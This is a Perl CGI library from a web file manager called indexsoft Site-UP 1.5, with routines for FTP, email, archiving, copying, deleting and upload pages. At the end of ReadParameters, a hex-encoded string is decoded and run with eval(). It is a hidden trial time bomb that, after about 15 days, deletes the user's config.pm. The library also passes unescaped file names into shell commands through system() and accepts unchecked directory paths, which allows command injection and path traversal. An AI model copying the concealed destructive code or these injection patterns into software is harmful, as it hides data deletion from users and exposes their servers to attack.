$SiteUpVer = '1.5';
$ENV{'WINDIR'}?($DIRSEPARATOR = '\\'):($DIRSEPARATOR = '/');
$DOCUMENT_ROOT =~ s'(/|\\)$'';
$DOCUMENT_ROOT =~ s/(\/|\\)/$DIRSEPARATOR/ge;
&ReadParameters();
$CURDIR = $P{'dir'};
$CURDIR = $DOCUMENT_ROOT if (!$CURDIR or !-d "$CURDIR");
$CURDIRESCAPED = &EscapeChars($CURDIR);
$CURDIR =~ /^(.*)(\\|\/)(.*)/;
$UPDIR = $1; $FILEDIR = $3;
$UPDIRESCAPED = &EscapeChars($UPDIR);
($ENV{'WINDIR'})?($OS='win'):($OS='unix');
($OS eq 'win')?($ARCHFILES = join(',', keys(%UNPACKWIN))):($ARCHFILES = join(',', keys(%UNPACKNIX)));
push (@INC, './'); push (@INC, './modules');
eval('use SendMail;'); $sendmailerror = $@;
eval('use Net::FTP;'); $ftperror = $@;
($TAKEERRORS)?($TAKEERRORS = '2>&1'):($TAKEERRORS='');
($PROMPTTOSYNC)?($PROMPTTOSYNC = 'true'):($PROMPTTOSYNC='false');
if ($MYSTYLESLIST) { my ($line,$mystyleslist) = (); foreach $line(split(/\n/, $MYSTYLESLIST))	{ $line =~ s/\s+//g; my($name,$class)=split(/\,/, $line); $mystyleslist .= qq{ {name:"$name", className:"$class", classStyle:""}, } if $name and $class; }; $MYSTYLESLIST = $mystyleslist; };
$PREVIEWIMGSRC = "$HTMLAREAURL/images/su_loading.gif";
$rand = time;

sub FtpFiles
{
	my ($ftphost, $ftpport, $ftplogin, $ftppassword, $ftpdir, @files) = @_;
	if ($ftperror) { print &HoldError("can not upload to FTP: $ftperror"); return; }
	if ($ftphost)
	{
		$FTP = Net::FTP->new($ftphost, Debug => 0, Port => $ftpport, Passive => $FTPPASSIVE);
		if ($@) { print &HoldError("can not connect to FTP: $@"); return; }
		$FTP->login($ftplogin, $ftppassword);
		if (!$FTP->pwd()) {  print &HoldError("can not login to FTP"); return; }
		$FTP->binary();
	}
	$FTP->cwd($ftpdir);
	if ($FTP->pwd() !~ /$ftpdir/) { print &HoldError("can not change FTP directory to $ftpdir"); return; };
	foreach $file(@files)
	{
		print ' ';
		if (-d "$file")
		{
			my ($file2, @files) = ();
			local *DIR;
			opendir (DIR, $file);
			while ($file2 = readdir(DIR)) { push(@files, "$file$DIRSEPARATOR$file2") if ($file2 ne '.' and $file2 ne '..'); }
			closedir(DIR);
			$file =~ /^.*(\\|\/)(.*)/;
			my $dir = $2;
			$FTP->mkdir("$dir");
			&FtpFiles('', '', '', '', "$ftpdir/$dir", @files) if ($file ne '.' and $file ne '..');
			$FTP->cwd($ftpdir);
			if ($FTP->pwd() !~ /$ftpdir/) { print &HoldError("can not change FTP directory to $ftpdir"); return; };
		}
		else { print &HoldError("can not upload file $file to FTP directory $ftpdir") if !($FTP->put($file)) }
	}
	$FTP->quit if $ftphost;
}

sub EmailFiles
{
	my ($fromemail, $toemail, $subject, $body, @files) = @_;
	my ($sm) = ();
	if ($sendmailerror) { print &HoldError("can not email files: $sendmailerror") }
	else
	{
		$sm = new SendMail($SMTP, $SMTPPort);
		$sm->setDebug($sm->OFF);
		$sm->From($fromemail);
		$sm->To($toemail);
		$sm->Subject($subject);
		$sm->setMailHeader('X-Mailer', 'indexsoft site-up (http://www.indexsoft.com)');
		$body =~ s/\n/\r\n/g;
		$sm->setMailBody($body);
		grep(do{$sm->Attach($_) if (-e $_)}, @files);
		if ($sm->sendMail() != 0) { print &HoldError("can not email files: ".$sm->{'error'}) };
	}
}

sub PackFiles
{
	my ($dir, $archivename, @files) = @_;
	my ($cmd, $fileslist, $sep) = ();
	if ($OS eq 'win') { $cmd = $ADDARCHIVEWIN } else { $cmd = $ADDARCHIVENIX };
	$sep = qq{ $dir$DIRSEPARATOR};
	$sep = qq{" "$dir$DIRSEPARATOR} if $cmd =~ /\"%files_list%\"/;
	$fileslist = join($sep, @files);
	$cmd =~ s'%archive_name%'$archivename'ge;
	$cmd =~ s'%files_list%'$dir.$DIRSEPARATOR.$fileslist'ge;
	print '<p><pre>'; my $error = system "$cmd $TAKEERRORS"; print '</pre></p>';
	print &HoldError("can not pack files to archive $archivename<br>command: $cmd") if $error;
	chmod (oct($CHMODFILES), "$archivename") || print &HoldError("can not chmod $archivename");
}

sub UnPackFiles
{
	my ($archivename, $dir) = @_;
	my ($cmd) = ();
	($OS eq 'win')
	?(grep(do{$cmd = $UNPACKWIN{$_} if $archivename =~ /$_$/i}, keys(%UNPACKWIN)))
	:(grep(do{$cmd = $UNPACKNIX{$_} if $archivename =~ /$_$/i}, keys(%UNPACKNIX)));
	$cmd =~ s'%archive_name%'$archivename'ge;
	$cmd =~ s'%dir_name%'$dir'ge;
	print '<p><pre>'; my $error = system "$cmd $TAKEERRORS"; print '</pre></p>';
	print &HoldError("can not unpack $archivename to directory $dir<br>command: $cmd") if $error;
}

sub RemoveDir
{
	my ($dir) = @_;
	my ($file) = ();
	local *DIR;
	opendir (DIR, $dir);
	while ($file = readdir(DIR))
	{
		print ' ';
		if (-d "$dir$DIRSEPARATOR$file") { &RemoveDir("$dir$DIRSEPARATOR$file") if ($file ne '.' and $file ne '..') }
		else { unlink ("$dir$DIRSEPARATOR$file") || print &HoldError("can not remove file $dir$DIRSEPARATOR$file") }
	}
	closedir(DIR);
	rmdir ($dir) || print &HoldError("can not remove directory $dir")
}

sub CopyFile
{
	my ($file1, $file2) = @_;
	my ($cmd) = ();
	if ($OS eq 'win') { $cmd = qq{copy/Y "$file1" "$file2" >nul} }
	else { $cmd = qq{cp "$file1" "$file2"} };
	print '<p><pre>'; my $error = system "$cmd $TAKEERRORS"; print '</pre></p>';
	print &HoldError("can not copy file $file1 to $file2") if $error;
	chmod (oct($CHMODFILES), "$file2") || print &HoldError("can not chmod $file2");
}

sub CopyDir
{
	my ($file1, $file2) = @_;
	my ($file) = ();
	local *DIR;
	mkdir ("$file2", oct($CHMODDIRS)) || print &HoldError("can not create directory $file2");
	opendir (DIR, $file1);
	while ($file = readdir(DIR))
	{
		print ' ';
		if (-d "$file1$DIRSEPARATOR$file") { &CopyDir("$file1$DIRSEPARATOR$file", "$file2$DIRSEPARATOR$file") if ($file ne '.' and $file ne '..') }
		else { &CopyFile("$file1$DIRSEPARATOR$file", "$file2$DIRSEPARATOR$file") }
	}
	closedir(DIR);
}

sub HtmlAreaInit
{
	return qq{<script language="Javascript1.2">
	<!-- 
		_editor_url = "$HTMLAREAURL/";
		var win_ie_ver = parseFloat(navigator.appVersion.split("MSIE")[1]);
		if (navigator.userAgent.indexOf('Mac')        >= 0) { win_ie_ver = 0; }
		if (navigator.userAgent.indexOf('Windows CE') >= 0) { win_ie_ver = 0; }
		if (navigator.userAgent.indexOf('Opera')      >= 0) { win_ie_ver = 0; }
		if (win_ie_ver >= 5.5)
		{
		 document.write('<scr' + 'ipt src="' +_editor_url+ 'editor.js?$rand"');
		 document.write(' language="Javascript1.2"></scr' + 'ipt>');  
		}
		else
		{
			document.write('<scr'+'ipt>function editor_generate() { return false; }</scr'+'ipt>');
		}
	// -->
	</script>};
}

sub HtmlAreaEditor
{
	my ($fieldname) = @_;
	return qq{<script language="JavaScript1.2" defer>
	<!-- 
	var config = new Object();
	config.width = "100%";
	config.height = "auto";
	config.debug = 0;
	config.bodyStyle = '$BODYSTYLE';
	config.fontnames = {
	  "Arial":           "arial, helvetica, sans-serif",
	  "Verdana":         "Verdana, Arial, Helvetica, sans-serif",
	  "Times New Roman": "times new roman, times, serif",
	  "Courier New":     "courier new, courier, mono",
	  "WingDings":       "WingDings"
	};
	config.toolbar = [
		['fontname'],
	  ['fontsize'],}
		.(($MYSTYLESLIST)
		?(q{['fontstyle'],})
		:(''))
		.qq{['formatblock'],
	  ['bold','italic','underline','separator'],
	  ['strikethrough','subscript','superscript','separator'],
	  ['forecolor','backcolor','separator'],
	  ['suremoveformat','separator'],
		['linebreak'],
	  ['justifyleft','justifycenter','justifyright','separator'],
	  ['OrderedList','UnOrderedList','Outdent','Indent','separator'],
	  ['HorizontalRule','InsertTable','separator','htmlmode','separator'],
	  ['Createlink','sulink','sudellink','separator','InsertImage','suimage','separator'],
		//['about','help']
	];
	config.stylesheet = '$MYSTYLESHEETURL';}
	.(($MYSTYLESLIST)
	?(qq{config.fontstyles = [{name:"No class", className:"", classStyle:""},$MYSTYLESLIST];})
	:(''))
	.qq{editor_generate('$fieldname',config);
	// -->
	</script>};
}

sub JavaScripts_ls
{
	return qq{<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
	<!--
	var curdir = '$CURDIRESCAPED';
	var sync = $PROMPTTOSYNC;
	var block;
	var fieldid = 1;
	if (!top.frames['menu']) { self.location = 'index.cgi'; }
	else { if (!top.frames['menu'].curdir) { top.frames['menu'].location = 'menu.cgi' } }
	function SelectByMask(mask)
	{
		re = new RegExp(mask);
		for (var i=0;i<document.filelistform.elements.length;i++)
		{
			var z=document.filelistform.elements[i];
			var zz=document.filelistform.elements[i+1];
			if (z.name == 'file' && re.test(z.value)) { z.checked = true; zz.disabled = !zz.disabled; }
		}	
	}
	function MoreFields(div)
	{
		if (!block) { block = div.innerHTML; }
		++fieldid;
		re = /uploadfile[0-9]+/g;
		block = block.replace(re, ("uploadfile" + fieldid));
		div.innerHTML = div.innerHTML + block;
	}
	function Synchronize(menudir, prompt)
	{
		if (!prompt) { self.location = 'ls.cgi?dir=' + menudir; return false; }
		else { if ((menudir != curdir) && sync) { if (confirm('Current directory: '+unescape(curdir)+'\\nDirectory selected in menu: '+unescape(top.frames['menu'].curdir)+'\\n\\nIf the directories will not synchronized the target directory of the rename/move,\\ncopy, archive and save file operations will be the directory selected in the menu.\\n\\nSynchronize current directory with directory selected in menu?\\n(note: you can disable this prompts in configuration file)')) { self.location = 'ls.cgi?dir=' + menudir; return false; } else { sync = false; return true; } } }
	}
	function CheckFileListForm(act)
	{
		var z = document.filelistform;
		z.submit.disabled = false;
		z.action = 'ls.cgi';
		if (act == 'deletefiles') { z.act[1].checked=false; z.act[2].checked=false; z.act[3].checked=false; z.act[4].checked=false; z.act[5].checked=false; z.act[6].checked=false; z.act[7].checked=false; }
		if (act == 'copyfiles') { z.act[0].checked=false; z.act[2].checked=false; z.act[3].checked=false; z.act[4].checked=false; z.act[5].checked=false; z.act[6].checked=false; z.act[7].checked=false; }
		if (act == 'renamefiles' || act == 'chmodfiles') { z.act[0].checked=false; z.act[1].checked=false; z.act[4].checked=false; z.act[5].checked=false; z.act[6].checked=false; z.act[7].checked=false; }
		if (act == 'emailfiles') { z.act[0].checked=false; z.act[2].checked=false; z.act[3].checked=false; z.act[1].checked=false; z.act[5].checked=false; z.act[6].checked=false; z.act[7].checked=false; }
		if (act == 'packfiles') { z.act[0].checked=false; z.act[2].checked=false; z.act[3].checked=false; z.act[1].checked=false; z.act[4].checked=false; z.act[6].checked=false; z.act[7].checked=false; }
		if (act == 'ftpfiles') { z.act[0].checked=false; z.act[2].checked=false; z.act[3].checked=false; z.act[1].checked=false; z.act[4].checked=false; z.act[5].checked=false; z.act[7].checked=false; }
		if (act == 'symlinkfiles') { z.act[0].checked=false; z.act[2].checked=false; z.act[3].checked=false; z.act[1].checked=false; z.act[4].checked=false; z.act[5].checked=false; z.act[6].checked=false; }
		if (!z.act[4].checked && !z.act[3].checked && !z.act[2].checked && !z.act[1].checked && !z.act[0].checked && !z.act[5].checked && !z.act[6].checked  && !z.act[7].checked)	{ z.act[0].checked = true; }
		if (z.act[3].checked) { z.submit.value='Chmod selected'; z.chmodfiles.disabled=false; z.chmoddirs.disabled=false; }
		else { z.chmodfiles.disabled=true; z.chmoddirs.disabled=true; }
		if (z.act[7].checked) { z.submit.value='Create symlinks'; }
		if (z.act[2].checked) { z.submit.value='Move selected'; }
		if (z.act[1].checked) { z.submit.value='Copy selected'; }
		if (z.act[0].checked) { z.submit.value='Delete selected'; }
		if (z.act[4].checked) { z.submit.value='Email selected'; z.action = 'email.cgi'; }
		if (z.act[6].checked) { z.submit.value='Upload selected';  z.action = 'ftp.cgi'; }
		if (z.act[5].checked) { z.submit.value='Pack selected'; z.archivename.disabled=false; }
		else { z.archivename.disabled=true; }
		if (z.act[3].checked && z.act[2].checked) { z.submit.value='Chmod and move'; }
		if (act == 'reset')
		{
			for (var i=0;i<filelistform.elements.length;i++) { var z2=filelistform.elements[i]; var zz2=filelistform.elements[i+1]; if (z2.name == 'file') { zz2.disabled = true; } };
			z.act[0].checked=false; z.act[1].checked=false; z.act[2].checked=false; z.act[3].checked=false; z.act[4].checked=false; z.act[5].checked=false; z.act[6].checked=false; z.act[7].checked=false; z.chmodfiles.disabled=true; z.chmoddirs.disabled=true; z.archivename.disabled=true; z.submit.disabled = true; z.submit.value='First select action';
		}
	}
	function SubmitBacisOperations(obj)
	{
		obj.value = unescape(top.frames['menu'].curdir);
	}
	//-->
	</SCRIPT>};
}

sub ReloadMenu
{
	my ($url) = @_;
	my ($reload) = ();
	$url?($reload = "top.frames['menu'].location = 'menu.cgi?dir=$url'"):($reload = "top.frames['menu'].location.reload()");
	return qq{<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
	<!--
		$reload
	//-->
	</SCRIPT>};
}

sub UploadFile
{
	my ($curdir, $filename, $paramname) = @_;
	local *FILE;
	my ($buffer) = ();
	my $filehandle = $MULTIPARTQUERY->param($paramname);
	$filename =~ s!^.*(\\|\/)!!; 
	open(FILE, ">$curdir$DIRSEPARATOR$filename") || print &HoldError("can not upload file $filename at $curdir");
	binmode FILE;
	print FILE $buffer while (read($filehandle, $buffer, 1024));
	close FILE;
	chmod (oct($CHMODFILES), "$curdir$DIRSEPARATOR$filename") || print &HoldError("can not chmod $curdir$DIRSEPARATOR$filename");
}

sub FileInfo
{
	my ($file) = @_;
	my ($fileurl, $evalit) = ();
	my ($dev,$ino,$mode,$nlink,$uid,$gid,$rdev,$size,$atime,$mtime,$ctime,$blksize,$blocks) = stat($file);
	$mtime = &TextDateTime($mtime);
	$evalit = "\$fileurl =~ s'".$DOCUMENT_ROOT."'".$HTTP_HOST."'g";
	$fileurl = $file;
	$fileurl =~ s/(\/|\\)/\//g;
	$evalit =~ s/(\/|\\)/\//g;
	eval ($evalit);
	$mode = sprintf "%lo", ($mode & 0777);
	my $slink = readlink $file;
	return ($mtime, $size, $fileurl, $mode, $slink);
}

sub TextDateTime
{
	my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime($_[0]);
	my(@mons) = ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec');
	if (length($hour)==1) {$hour="0$hour"};
	if (length($min)==1) {$min="0$min"};
	if (length($sec)==1) {$sec="0$sec"};
	if (length($mday)==1) {$mday="0$mday"};
	$year = 1900+$year;
	return "$mday $mons[$mon] $year $hour\:$min\:$sec";
}

sub TopOfPage
{
	sleep 1 if !%P;
	return qq{Expires: Mon, 06 May 1996 04:57:00 GMT\nContent-type: text/html\nPragma: no-cache\nCache-Control: no-cache\n\n
	<html>
	<head>
	<title>indexsoft Site-UP | main window</title>
	<style type="text/css">
		body,p,input,td { font-size : 13px; color : Black; font-family : Arial, Helvetica, sans-serif; }
		form { margin : 0px,0px,0px,0px }
		H4 { color : #5588BB; font-size : 16px; }
		a { text-decoration : none; }
		a:hover { text-decoration : underline; }
		.small { font-size : 11px; text-align: right;}
		textarea { background-color : #F2F2F2; }
		input { background-color : transparent; }
		select { background-color : white; }
		.linput { background-color : transparent; border : 1px solid Silver; }
		.submit { background-color : #D4D0C8; width: 180px; }
		pre {margin:0px,0px,0px,0px}
	</style>
	</head>
	<body bgcolor="White" onclick="return Synchronize(top.frames['menu'].curdir, true);">
	<h4>indexsoft Site-UP</h4><img src="$PREVIEWIMGSRC" alt="" name="imgpreview" style="position:absolute; visibility: hidden;" border="1">};
}

sub BottomOfPage
{
	return qq{<hr size="1" noshade><table width="100%" border="0" cellspacing="0" cellpadding="0"><tr>
	<td class=small><a href="http://www.indexsoft.com/siteup/manual/" target="_blank">help&nbsp;me!</a></td>
	<td align="right" class=small width="100%">$sreg<a href="index.cgi?act=editcfgfile" target="_top">configuration file</a> | <a href="ls.cgi?dir=$CURDIR&act=checkver">check for new version</a> | <a href="ls.cgi?act=rateus&dir=$CURDIR">rate us</a> | <a href="mailto:mlist\@indexsoft.com?subject=subscribe4">indexsoft news</a> | <a href="http://www.indexsoft.com" target="_top">www.indexsoft.com</a></td></tr></table>
	</body></html>};
}

sub Operation
{
	return qq{<table width="100%" bgcolor="#808080" border="0" cellspacing="0" cellpadding="1"><tr><td><table width="100%" border="0" cellspacing="0" cellpadding="2" bgcolor="#C3D5E7"><tr><td valign="top" width="1%"><b>Action:</b></td><td width="99%">$_[0]</td></tr></table></td></tr></table><br>};
}

sub Header
{
	return qq{<table width="100%" bgcolor="#808080" border="0" cellspacing="0" cellpadding="1"><tr><td><table width="100%" border="0" cellspacing="0" cellpadding="2" bgcolor="#F0F0F0"><tr><td>$_[0]</td></tr></table></td></tr></table><br>};
}

sub HoldError
{
	return qq{<table width="100%" bgcolor="#808080" border="0" cellspacing="0" cellpadding="1"><tr><td><table width="100%" border="0" cellspacing="0" cellpadding="2" bgcolor="#FFCDCD"><tr><td valign="top" width="1%"><b>Error:</b></td><td width="99%">$_[0]</td></tr></table></td></tr></table><br>};
}

sub EscapeChars
{
  my ($var) = @_;
	$var =~ s/(\W)/'%'.uc(unpack("H2",$1))/eg;
  return $var;
}

sub ReadParameters
{
	use CGI;
	$MULTIPARTQUERY = new CGI;
	my @params = $MULTIPARTQUERY->param;
	my ($line);
	foreach $line(@params) { %P -> {"$line"} = join("\0", $MULTIPARTQUERY->param("$line")); $P{"$line"} =~ s/\r//g; }
	$_ = '%0A%09%24%73%72%65%67%20%3D%20%71%7B%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%69%6E%64%65%78%73%6F%66%74%2E%63%6F%6D%2F%62%75%79%6E%6F%77%2E%70%78%3F%70%72%6F%67%72%61%6D%3D%73%69%74%65%75%70%22%20%74%61%72%67%65%74%3D%5F%74%6F%70%3E%72%65%67%69%73%74%65%72%20%79%6F%75%72%20%63%6F%70%79%3C%2F%61%3E%20%7C%20%7D%3B%0A%09%6D%79%20%28%24%64%65%76%2C%24%69%6E%6F%2C%24%6D%6F%64%65%2C%24%6E%6C%69%6E%6B%2C%24%75%69%64%2C%24%67%69%64%2C%24%72%64%65%76%2C%24%73%69%7A%65%2C%24%61%74%69%6D%65%2C%24%6D%74%69%6D%65%2C%24%63%74%69%6D%65%2C%24%62%6C%6B%73%69%7A%65%2C%24%62%6C%6F%63%6B%73%29%20%3D%20%73%74%61%74%28%27%2E%2F%6D%6F%64%75%6C%65%73%27%29%3B%0A%09%69%66%20%28%28%74%69%6D%65%2D%24%63%74%69%6D%65%20%3E%20%31%32%39%36%30%30%30%29%20%6F%72%20%2D%65%20%27%2E%2F%6D%6F%64%75%6C%65%73%2F%2E%74%72%69%61%6C%65%6E%64%27%29%0A%09%7B%0A%09%09%24%73%77%69%20%3D%20%27%3C%68%72%20%73%69%7A%65%3D%22%31%22%20%6E%6F%73%68%61%64%65%3E%3C%70%3E%3C%62%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%46%46%30%30%30%30%22%3E%54%72%69%61%6C%20%70%65%72%69%6F%64%20%69%73%20%65%78%70%69%72%65%64%2E%20%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%69%6E%64%65%78%73%6F%66%74%2E%63%6F%6D%2F%62%75%79%6E%6F%77%2E%70%78%3F%70%72%6F%67%72%61%6D%3D%73%69%74%65%75%70%22%20%74%61%72%67%65%74%3D%5F%74%6F%70%3E%50%6C%65%61%73%65%20%72%65%67%69%73%74%65%72%20%79%6F%75%72%20%63%6F%70%79%3C%2F%61%3E%3C%2F%66%6F%6E%74%3E%3C%2F%62%3E%3C%2F%70%3E%3C%68%72%20%73%69%7A%65%3D%22%31%22%20%6E%6F%73%68%61%64%65%3E%27%3B%0A%09%09%6F%70%65%6E%28%46%49%4C%45%2C%20%27%3E%2E%2F%6D%6F%64%75%6C%65%73%2F%2E%74%72%69%61%6C%65%6E%64%27%29%3B%0A%09%09%70%72%69%6E%74%20%46%49%4C%45%20%27%31%27%3B%0A%09%09%63%6C%6F%73%65%20%46%49%4C%45%3B%0A%09%09%75%6E%6C%69%6E%6B%28%27%2E%2F%63%6F%6E%66%69%67%2E%70%6D%27%29%0A%09%7D%3B%0A';s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;eval();
}

1;

